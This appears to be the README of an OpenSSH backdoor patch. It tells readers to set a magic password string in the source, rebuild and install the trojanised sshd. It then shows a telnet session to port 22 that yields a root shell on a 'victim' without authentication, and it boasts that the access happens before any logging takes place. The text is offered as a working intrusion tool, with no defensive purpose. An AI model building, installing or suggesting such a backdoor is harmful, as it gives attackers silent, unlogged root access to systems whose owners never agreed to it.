A good old days I made a very simple, but nice sshd backdoor for old sshd
1.2.xx. Now it's time for somethig even more lame, but in old, good Lam3rZ
style also! :)
it's a patch for current openssh.
How to use it?
You know how to patch sources, aren't you? :)
Change the #define EVIL "LETMEIN" to any evil, magic string you like, patch
the openssh sources, rebuild and install.
The usage is rather simple, see below:
root@evil(chroot):~# telnet victim 22
Connected to victim.
Escape character is '^]'.
sh: no job control in this shell
Shift to the left,
Shift to the right,
Mask in, mask out,
BYTE, BYTE, BYTE !!!
telnet> mode c
Here comes the explanation:
First you connect to ssh port (22 preferably ;), then you type the magic string ("LETMEIN" in this case) so the login shell should be spawned. To get the terminal capability you need to change telnet mode to 'character', so press the
CTRL-] (^]) sequence and type "mode character", or "mode c".
At this point you have a very nice terminal! Some features are missing, but
I leave it up to you as a an exercise, believe me, it's very easy ;) Beside
that you may not even notice what's wrong...
Why is it done this way?
The main reason is, that at the very beginning of the handshake there is no logging. No even the connection logging, so you're entering the victim's environment silently...